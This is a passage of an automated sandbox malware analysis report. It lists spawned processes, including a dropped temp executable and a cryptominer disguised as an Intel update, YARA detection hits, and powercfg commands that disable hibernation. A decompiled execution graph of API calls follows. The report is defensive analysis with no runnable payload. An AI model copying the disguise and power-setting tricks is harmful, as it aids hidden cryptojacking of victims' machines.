                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                              Start time:19:01:46
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                              Start time:19:01:46
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                              Start time:19:01:46
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                              Start time:19:01:46
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                              Start time:19:01:47
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe"
                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                              File size:4'482'048 bytes
                                                                                                                                                                                              MD5 hash:7BDD52D200B7195B67E68677DFD53B48
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                              Start time:19:01:49
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                              Imagebase:0x7ff77d620000
                                                                                                                                                                                              File size:1'827'328 bytes
                                                                                                                                                                                              MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000033.00000003.2959352962.0000020D0FBB0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000033.00000003.2959352962.0000020D0FBB0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000033.00000003.2959352962.0000020D0FBB0000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 67%, ReversingLabs
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                              Start time:19:01:53
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                                                              Imagebase:0x7ff70a1a0000
                                                                                                                                                                                              File size:22'528 bytes
                                                                                                                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                              Start time:19:01:57
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                              Imagebase:0x197335f0000
                                                                                                                                                                                              File size:65'168 bytes
                                                                                                                                                                                              MD5 hash:A4EB36BAE72C5CB7392F2B85609D4A7E
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:54
                                                                                                                                                                                              Start time:19:01:59
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                              Imagebase:0x7ff79c180000
                                                                                                                                                                                              File size:96'256 bytes
                                                                                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:55
                                                                                                                                                                                              Start time:19:01:59
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                              Imagebase:0x7ff79c180000
                                                                                                                                                                                              File size:96'256 bytes
                                                                                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                              Start time:19:01:59
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:5.7%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                Signature Coverage:3.7%
                                                                                                                                                                                                Total number of Nodes:756
                                                                                                                                                                                                Total number of Limit Nodes:16
                                                                                                                                                                                                execution_graph 12169 ef6629 12172 ef64c7 12169->12172 12173 ef64d5 __cftof 12172->12173 12174 ef6520 12173->12174 12177 ef652b 12173->12177 12176 ef652a 12183 efa302 GetPEB 12177->12183 12179 ef6535 12180 ef653a GetPEB 12179->12180 12181 ef654a __cftof 12179->12181 12180->12181 12182 ef6562 ExitProcess 12181->12182 12184 efa31c __cftof 12183->12184 12184->12179 12918 ec9ba5 12919 ec9ba7 12918->12919 12920 ec5c10 6 API calls 12919->12920 12921 ec9cb1 12920->12921 12922 ec8b30 6 API calls 12921->12922 12923 ec9cc2 12922->12923 12380 ecb1a0 12381 ecb1f2 12380->12381 12382 ecb3ad CoInitialize 12381->12382 12383 ecb3fa shared_ptr std::invalid_argument::invalid_argument 12382->12383 12523 ec20a0 12524 edc68b __Mtx_init_in_situ 2 API calls 12523->12524 12525 ec20ac 12524->12525 12680 ec4120 12681 ec416a 12680->12681 12682 ec41b2 std::invalid_argument::invalid_argument 12681->12682 12684 ec3ee0 12681->12684 12685 ec3f1e 12684->12685 12686 ec3f48 12684->12686 12685->12682 12687 ec3f58 12686->12687 12690 ec2c00 12686->12690 12687->12682 12691 ec2c0e 12690->12691 12697 edb847 12691->12697 12693 ec2c42 12694 ec2c49 12693->12694 12703 ec2c80 12693->12703 12694->12682 12696 ec2c58 std::_Throw_future_error 12698 edb854 12697->12698 12702 edb873 Concurrency::details::_Reschedule_chore 12697->12702 12706 edcb77 12698->12706 12700 edb864 12700->12702 12708 edb81e 12700->12708 12702->12693 12714 edb7fb 12703->12714 12705 ec2cb2 shared_ptr 12705->12696 12707 edcb92 CreateThreadpoolWork 12706->12707 12707->12700 12709 edb827 Concurrency::details::_Reschedule_chore 12708->12709 12712 edcdcc 12709->12712 12711 edb841 12711->12702 12713 edcde1 TpPostWork 12712->12713 12713->12711 12715 edb807 12714->12715 12717 edb817 12714->12717 12715->12717 12718 edca78 12715->12718 12717->12705 12719 edca8d TpReleaseWork 12718->12719 12719->12717 12802 ec3fe0 12803 ec4022 12802->12803 12804 ec408c 12803->12804 12805 ec40d2 12803->12805 12808 ec4035 std::invalid_argument::invalid_argument 12803->12808 12809 ec35e0 12804->12809 12806 ec3ee0 3 API calls 12805->12806 12806->12808 12810 ec3616 12809->12810 12814 ec364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 12810->12814 12815 ec2ce0 12810->12815 12812 ec369e 12813 ec2c00 3 API calls 12812->12813 12812->12814 12813->12814 12814->12808 12816 ec2d1d 12815->12816 12817 edbedf InitOnceExecuteOnce 12816->12817 12818 ec2d46 12817->12818 12819 ec2d51 std::invalid_argument::invalid_argument 12818->12819 12820 ec2d88 12818->12820 12824 edbef7 12818->12824 12819->12812 12822 ec2440 4 API calls 12820->12822 12823 ec2d9b 12822->12823 12823->12812 12825 edbf03 std::_Throw_future_error 12824->12825 12826 edbf6a 12825->12826 12827 edbf73 12825->12827 12831 edbe7f 12826->12831 12829 ec2ae0 5 API calls 12827->12829 12830 edbf6f 12829->12830 12830->12820 12832 edcc31 InitOnceExecuteOnce 12831->12832 12833 edbe97 12832->12833 12834 edbe9e 12833->12834 12835 ef6cbb 4 API calls 12833->12835 12834->12830 12836 edbea7 12835->12836 12836->12830 13012 ecaf20 13013 ecaf63 13012->13013 13024 ef6660 13013->13024 13018 ef663f 4 API calls 13019 ecaf80 13018->13019 13020 ef663f 4 API calls 13019->13020 13021 ecaf98 __cftof 13020->13021 13030 ec55f0 13021->13030 13023 ecb04e shared_ptr std::invalid_argument::invalid_argument 13025 efa671 __cftof 4 API calls 13024->13025 13026 ecaf69 13025->13026 13027 ef663f 13026->13027 13028 efa671 __cftof 4 API calls 13027->13028 13029 ecaf71 13028->13029 13029->13018 13031 ec5610 13030->13031 13033 ec5710 std::invalid_argument::invalid_argument 13031->13033 13034 ec22c0 13031->13034 13033->13023 13037 ec2280 13034->13037 13038 ec2296 13037->13038 13041 ef87f8 13038->13041 13044 ef7609 13041->13044 13043 ec22a4 13043->13031 13045 ef7649 13044->13045 13049 ef7631 ___std_exception_copy std::invalid_argument::invalid_argument 13044->13049 13046 ef690a __cftof 4 API calls 13045->13046 13045->13049 13047 ef7661 13046->13047 13050 ef7bc4 13047->13050 13049->13043 13052 ef7bd5 13050->13052 13051 ef7be4 ___std_exception_copy 13051->13049 13052->13051 13057 ef8168 13052->13057 13062 ef7dc2 13052->13062 13067 ef7de8 13052->13067 13077 ef7f36 13052->13077 13058 ef8171 13057->13058 13060 ef8178 13057->13060 13086 ef7b50 13058->13086 13060->13052 13061 ef8177 13061->13052 13063 ef7dcb 13062->13063 13065 ef7dd2 13062->13065 13064 ef7b50 4 API calls 13063->13064 13066 ef7dd1 13064->13066 13065->13052 13066->13052 13069 ef7e09 ___std_exception_copy 13067->13069 13070 ef7def 13067->13070 13068 ef7f69 13075 ef7f77 13068->13075 13076 ef7f8b 13068->13076 13094 ef8241 13068->13094 13069->13052 13070->13068 13070->13069 13072 ef7fa2 13070->13072 13070->13075 13072->13076 13090 ef8390 13072->13090 13075->13076 13098 ef86ea 13075->13098 13076->13052 13078 ef7f69 13077->13078 13080 ef7f4f 13077->13080 13081 ef8241 4 API calls 13078->13081 13084 ef7f77 13078->13084 13085 ef7f8b 13078->13085 13079 ef7fa2 13082 ef8390 4 API calls 13079->13082 13079->13085 13080->13078 13080->13079 13080->13084 13081->13084 13082->13084 13083 ef86ea 4 API calls 13083->13085 13084->13083 13084->13085 13085->13052 13087 ef7b62 13086->13087 13088 ef8ab6 4 API calls 13087->13088 13089 ef7b85 13088->13089 13089->13061 13091 ef83ab 13090->13091 13092 ef83dd 13091->13092 13102 efc88e 13091->13102 13092->13075 13095 ef825a 13094->13095 13109 efd3c8 13095->13109 13097 ef830d 13097->13075 13097->13097 13099 ef875d std::invalid_argument::invalid_argument 13098->13099 13101 ef8707 13098->13101 13099->13076 13100 efc88e __cftof 4 API calls 13100->13101 13101->13099 13101->13100 13105 efc733 13102->13105 13104 efc8a6 13104->13092 13106 efc743 13105->13106 13107 ef690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13106->13107 13108 efc748 __cftof ___std_exception_copy 13106->13108 13107->13108 13108->13104 13110 efd3d8 ___std_exception_copy 13109->13110 13112 efd3ee 13109->13112 13110->13097 13111 efd48a 13122 efcbdf 13111->13122 13112->13110 13112->13111 13116 efd485 13112->13116 13114 efd4ae 13117 efd4cc 13114->13117 13118 efd4b3 13114->13118 13115 efd4e4 13139 efcef8 13115->13139 13116->13114 13116->13115 13135 efd0e2 13117->13135 13128 efd23e 13118->13128 13123 efcbf1 13122->13123 13124 ef690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13123->13124 13125 efcc05 13124->13125 13126 efcef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 13125->13126 13127 efcc0d __alldvrm __cftof ___std_exception_copy _strrchr 13125->13127 13126->13127 13127->13110 13131 efd26c 13128->13131 13129 efd2a5 13129->13110 13130 efd2de 13133 efcf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13130->13133 13131->13129 13131->13130 13132 efd2b7 13131->13132 13134 efd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13132->13134 13133->13129 13134->13129 13136 efd10f 13135->13136 13137 efd14e 13136->13137 13138 efd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13136->13138 13137->13110 13138->13137 13140 efcf10 13139->13140 13141 efcf75 13140->13141 13142 efcf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13140->13142 13141->13110 13142->13141 12753 ec9ab8 12755 ec9acc 12753->12755 12756 ec9b08 12755->12756 12757 ec5c10 6 API calls 12756->12757 12758 ec9b7c 12757->12758 12759 ec8b30 6 API calls 12758->12759 12760 ec9b8d 12759->12760 12761 ec5c10 6 API calls 12760->12761 12762 ec9cb1 12761->12762 12763 ec8b30 6 API calls 12762->12763 12764 ec9cc2 12763->12764 12626 eca9f4 12635 ec9230 12626->12635 12628 ecaa03 shared_ptr 12629 ec5c10 6 API calls 12628->12629 12634 ecaab3 shared_ptr std::invalid_argument::invalid_argument 12628->12634 12630 ecaa65 12629->12630 12631 ec5c10 6 API calls 12630->12631 12632 ecaa8d 12631->12632 12633 ec5c10 6 API calls 12632->12633 12633->12634 12638 ec9284 shared_ptr 12635->12638 12636 ec5c10 6 API calls 12636->12638 12637 ec9543 shared_ptr std::invalid_argument::invalid_argument 12637->12628 12638->12636 12639 ec944f shared_ptr 12638->12639 12639->12637 12640 ec5c10 6 API calls 12639->12640 12642 ec979f shared_ptr 12639->12642 12640->12639 12641 ec98b5 shared_ptr std::invalid_argument::invalid_argument 12641->12628 12642->12641 12643 ec5c10 6 API calls 12642->12643 12644 ec9927 shared_ptr std::invalid_argument::invalid_argument 12643->12644 12644->12628 12787 ec4276 12788 ec2410 5 API calls 12787->12788 12789 ec427f 12788->12789 12654 ec2170 12657 edc6fc 12654->12657 12656 ec217a 12659 edc70c 12657->12659 12660 edc724 12657->12660 12659->12660 12661 edcfbe 12659->12661 12660->12656 12662 edccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12661->12662 12663 edcfd0 12662->12663 12663->12659 12664 ecad70 12665 ecaec0 shared_ptr std::invalid_argument::invalid_argument 12664->12665 12667 ecaddc shared_ptr 12664->12667 12667->12665 12668 ef8ab6 12667->12668 12669 ef8ad1 12668->12669 12670 ef8868 4 API calls 12669->12670 12671 ef8adb 12670->12671 12671->12667 12723 ec8d30 12724 ec8d7f 12723->12724 12725 ec5c10 6 API calls 12724->12725 12726 ec8d9a shared_ptr std::invalid_argument::invalid_argument 12725->12726 12765 ec42b0 12768 ec3ac0 12765->12768 12767 ec42bb shared_ptr 12769 ec3af9 12768->12769 12770 ec32d0 6 API calls 12769->12770 12772 ec3c38 12769->12772 12774 ec3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 12769->12774 12770->12772 12771 ec32d0 6 API calls 12775 ec3c5f 12771->12775 12772->12771 12772->12775 12773 ec3c68 12773->12767 12774->12767 12775->12773 12776 ec3810 4 API calls 12775->12776 12777 ec3cdb 12776->12777 12924 ec77b0 12925 ec77f1 shared_ptr 12924->12925 12926 ec5c10 6 API calls 12925->12926 12927 ec7883 shared_ptr 12925->12927 12926->12927 12928 ec5c10 6 API calls 12927->12928 12929 ec7953 shared_ptr std::invalid_argument::invalid_argument 12927->12929 12930 ec79e3 12928->12930 12931 ec5c10 6 API calls 12930->12931 12932 ec7a15 shared_ptr 12931->12932 12933 ec5c10 6 API calls 12932->12933 12938 ec7aa5 shared_ptr std::invalid_argument::invalid_argument 12932->12938 12934 ec7b7d 12933->12934 12935 ec5c10 6 API calls 12934->12935 12936 ec7ba0 12935->12936 12937 ec5c10 6 API calls 12936->12937 12937->12938 12939 ec87b0 12940 ec87b8 GetFileAttributesA 12939->12940 12941 ec87b6 12939->12941 12942 ec87c4 12940->12942 12941->12940 12943 ed47b0 12945 ed4eed 12943->12945 12944 ed4f59 shared_ptr std::invalid_argument::invalid_argument 12945->12944 12946 ec7d30 7 API calls 12945->12946 12947 ed50ed 12946->12947 12982 ec8380 12947->12982 12949 ed5106 12950 ec5c10 6 API calls 12949->12950 12951 ed5155 12950->12951 12952 ec5c10 6 API calls 12951->12952 12953 ed5171 12952->12953 12988 ec9a00 12953->12988 12983 ec83e5 __cftof 12982->12983 12984 ec5c10 6 API calls 12983->12984 12987 ec8403 shared_ptr std::invalid_argument::invalid_argument 12983->12987 12985 ec8427 12984->12985 12986 ec5c10 6 API calls 12985->12986 12986->12987 12987->12949 12989 ec9a3f 12988->12989 12990 ec5c10 6 API calls 12989->12990 12991 ec9a47 12990->12991 12992 ec8b30 6 API calls 12991->12992 12993 ec9a58 12992->12993 12439 ec87b2 12440 ec87b8 GetFileAttributesA 12439->12440 12441 ec87b6 12439->12441 12442 ec87c4 12440->12442 12441->12440 12526 ec3c8e 12527 ec3c98 12526->12527 12529 ec3ca5 12527->12529 12534 ec2410 12527->12534 12530 ec3ccf 12529->12530 12538 ec3810 12529->12538 12532 ec3810 4 API calls 12530->12532 12533 ec3cdb 12532->12533 12535 ec2424 12534->12535 12542 edb52d 12535->12542 12539 ec381c 12538->12539 12584 ec2440 12539->12584 12550 ef3aed 12542->12550 12544 ec242a 12544->12529 12545 edb5a5 ___std_exception_copy 12557 edb1ad 12545->12557 12546 edb598 12553 edaf56 12546->12553 12561 ef4f29 12550->12561 12552 edb555 12552->12544 12552->12545 12552->12546 12554 edaf9f ___std_exception_copy 12553->12554 12556 edafb2 shared_ptr 12554->12556 12567 edb39f 12554->12567 12556->12544 12558 edb1d8 12557->12558 12559 edb1e1 shared_ptr 12557->12559 12560 edb39f 5 API calls 12558->12560 12559->12544 12560->12559 12562 ef4f2e __cftof 12561->12562 12562->12552 12563 efd634 __cftof 4 API calls 12562->12563 12566 ef8bfc __cftof 12562->12566 12563->12566 12564 ef65ed __cftof 3 API calls 12565 ef8c2f 12564->12565 12566->12564 12568 edbedf InitOnceExecuteOnce 12567->12568 12569 edb3e1 12568->12569 12570 edb3e8 12569->12570 12578 ef6cbb 12569->12578 12570->12556 12579 ef6cc7 __cftof 12578->12579 12580 efa671 __cftof 4 API calls 12579->12580 12581 ef6ccc 12580->12581 12582 ef8bec __cftof 4 API calls 12581->12582 12583 ef6cf6 12582->12583 12587 edb5d6 12584->12587 12586 ec2472 12588 edb5f1 std::_Throw_future_error 12587->12588 12589 edb658 __cftof std::invalid_argument::invalid_argument 12588->12589 12590 ef8bec __cftof 4 API calls 12588->12590 12589->12586 12591 edb69f 12590->12591 13007 ec9f44 13008 ec9f4c shared_ptr 13007->13008 13009 eca953 Sleep CreateMutexA 13008->13009 13011 eca01f shared_ptr 13008->13011 13010 eca98e 13009->13010 12447 edd0c7 12449 edd0d7 12447->12449 12448 edd17f 12449->12448 12450 edd17b RtlWakeAllConditionVariable 12449->12450 12597 ec3c47 12598 ec3c51 12597->12598 12601 ec3c5f 12598->12601 12604 ec32d0 12598->12604 12599 ec3c68 12601->12599 12602 ec3810 4 API calls 12601->12602 12603 ec3cdb 12602->12603 12605 edc6ac GetSystemTimePreciseAsFileTime 12604->12605 12606 ec3314 12605->12606 12607 edc26a 5 API calls 12606->12607 12609 ec333c __Mtx_unlock 12606->12609 12607->12609 12608 edc26a 5 API calls 12610 ec3377 12608->12610 12609->12608 12611 ec3350 std::invalid_argument::invalid_argument 12609->12611 12612 edc6ac GetSystemTimePreciseAsFileTime 12610->12612 12611->12601 12613 ec33af 12612->12613 12614 edc26a 5 API calls 12613->12614 12615 ec33b6 12613->12615 12614->12615 12616 edc26a 5 API calls 12615->12616 12617 ec33d7 __Mtx_unlock 12615->12617 12616->12617 12618 edc26a 5 API calls 12617->12618 12619 ec33eb 12617->12619 12620 ec340e 12618->12620 12619->12601 12620->12601 12790 ef6a44 12791 ef6a5c 12790->12791 12792 ef6a52 12790->12792 12795 ef698d 12791->12795 12794 ef6a76 __freea 12796 ef690a __cftof 4 API calls 12795->12796 12797 ef699f 12796->12797 12797->12794 12384 ec8780 12385 ec8786 12384->12385 12391 ef6729 12385->12391 12388 ec87a6 12390 ec87a0 12398 ef6672 12391->12398 12393 ec8793 12393->12388 12394 ef67b7 12393->12394 12395 ef67c3 __cftof 12394->12395 12396 ef67cd ___std_exception_copy 12395->12396 12410 ef6740 12395->12410 12396->12390 12399 ef667e __cftof 12398->12399 12401 ef6685 ___std_exception_copy 12399->12401 12402 efa8c3 12399->12402 12401->12393 12403 efa8cf __cftof 12402->12403 12406 efa967 12403->12406 12405 efa8ea 12405->12401 12407 efa98a 12406->12407 12408 efd82f __cftof RtlAllocateHeap 12407->12408 12409 efa9d0 __freea 12407->12409 12408->12409 12409->12405 12411 ef6762 12410->12411 12413 ef674d __freea ___std_exception_copy 12410->12413 12411->12413 12414 efa038 12411->12414 12413->12396 12415 efa075 12414->12415 12416 efa050 12414->12416 12415->12413 12416->12415 12418 f00439 12416->12418 12420 f00445 __cftof 12418->12420 12419 f0044d __dosmaperr ___std_exception_copy 12419->12415 12420->12419 12422 f0052b 12420->12422 12423 f0054d 12422->12423 12424 f00551 __dosmaperr ___std_exception_copy 12422->12424 12423->12424 12428 f000d2 12423->12428 12424->12419 12429 f000e3 12428->12429 12430 efa671 __cftof 4 API calls 12429->12430 12431 f00106 12429->12431 12430->12431 12431->12424 12432 effcc0 12431->12432 12433 effd0d 12432->12433 12434 ef690a __cftof 4 API calls 12433->12434 12436 effd1c __cftof 12434->12436 12435 efffbc std::invalid_argument::invalid_argument 12435->12424 12436->12435 12437 efb67d 4 API calls 12436->12437 12438 efc719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 12436->12438 12437->12436 12438->12436 12451 ec20c0 12454 edc68b 12451->12454 12453 ec20cc 12457 edc3d5 12454->12457 12456 edc69b 12456->12453 12458 edc3e1 12457->12458 12459 edc3eb 12457->12459 12460 edc3be 12458->12460 12462 edc39e 12458->12462 12459->12456 12470 edcd0a 12460->12470 12462->12459 12466 edccd5 12462->12466 12463 edc3d0 12463->12456 12467 edc3b7 12466->12467 12468 edcce3 InitializeCriticalSectionEx 12466->12468 12467->12456 12468->12467 12471 edcd1f RtlInitializeConditionVariable 12470->12471 12471->12463 12472 ece0c0 recv 12473 ece122 recv 12472->12473 12474 ece157 recv 12473->12474 12475 ece191 12474->12475 12476 ece2b3 std::invalid_argument::invalid_argument 12475->12476 12481 edc6ac 12475->12481 12488 edc452 12481->12488 12483 ece2ee 12484 edc26a 12483->12484 12485 edc292 12484->12485 12486 edc274 12484->12486 12485->12485 12486->12485 12505 edc297 12486->12505 12489 edc47a std::invalid_argument::invalid_argument 12488->12489 12490 edc4a8 12488->12490 12489->12483 12490->12489 12494 edcf6b 12490->12494 12492 edc4fd __Xtime_diff_to_millis2 12492->12489 12493 edcf6b _xtime_get GetSystemTimePreciseAsFileTime 12492->12493 12493->12492 12495 edcf7a 12494->12495 12497 edcf87 __aulldvrm 12494->12497 12495->12497 12498 edcf44 12495->12498 12497->12492 12501 edcbea 12498->12501 12502 edcbfb GetSystemTimePreciseAsFileTime 12501->12502 12504 edcc07 12501->12504 12502->12504 12504->12497 12508 ec2ae0 12505->12508 12507 edc2ae std::_Throw_future_error 12516 edbedf 12508->12516 12510 ec2aff 12510->12507 12511 ec2af4 __cftof 12511->12510 12512 efa671 __cftof 4 API calls 12511->12512 12513 ef6ccc 12512->12513 12514 ef8bec __cftof 4 API calls 12513->12514 12515 ef6cf6 12514->12515 12519 edcc31 12516->12519 12520 edcc3f InitOnceExecuteOnce 12519->12520 12522 edbef2 12519->12522 12520->12522 12522->12511 12650 ec8980 12652 ec8aea 12650->12652 12653 ec89d8 shared_ptr 12650->12653 12651 ec5c10 6 API calls 12651->12653 12653->12651 12653->12652 12798 ec2e00 12799 ec2e28 12798->12799 12800 edc68b __Mtx_init_in_situ 2 API calls 12799->12800 12801 ec2e33 12800->12801 12735 ec9adc 12736 ec9aea 12735->12736 12740 ec9afe shared_ptr 12735->12740 12737 eca917 12736->12737 12736->12740 12738 eca953 Sleep CreateMutexA 12737->12738 12739 eca98e 12738->12739 12741 ec5c10 6 API calls 12740->12741 12742 ec9b7c 12741->12742 12749 ec8b30 12742->12749 12744 ec9b8d 12745 ec5c10 6 API calls 12744->12745 12746 ec9cb1 12745->12746 12747 ec8b30 6 API calls 12746->12747 12748 ec9cc2 12747->12748 12750 ec8b7c 12749->12750 12751 ec5c10 6 API calls 12750->12751 12752 ec8b97 shared_ptr std::invalid_argument::invalid_argument 12751->12752 12752->12744 12994 ec3f9f 12995 ec3fad 12994->12995 12996 ec3fb6 12994->12996 12997 ec2410 5 API calls 12995->12997 12997->12996 12677 ec215a 12678 edc6fc InitializeCriticalSectionEx 12677->12678 12679 ec2164 12678->12679 12185 eca856 12186 eca870 12185->12186 12187 eca892 shared_ptr 12185->12187 12186->12187 12189 eca94e 12186->12189 12188 eca8a0 12187->12188 12201 ec7d30 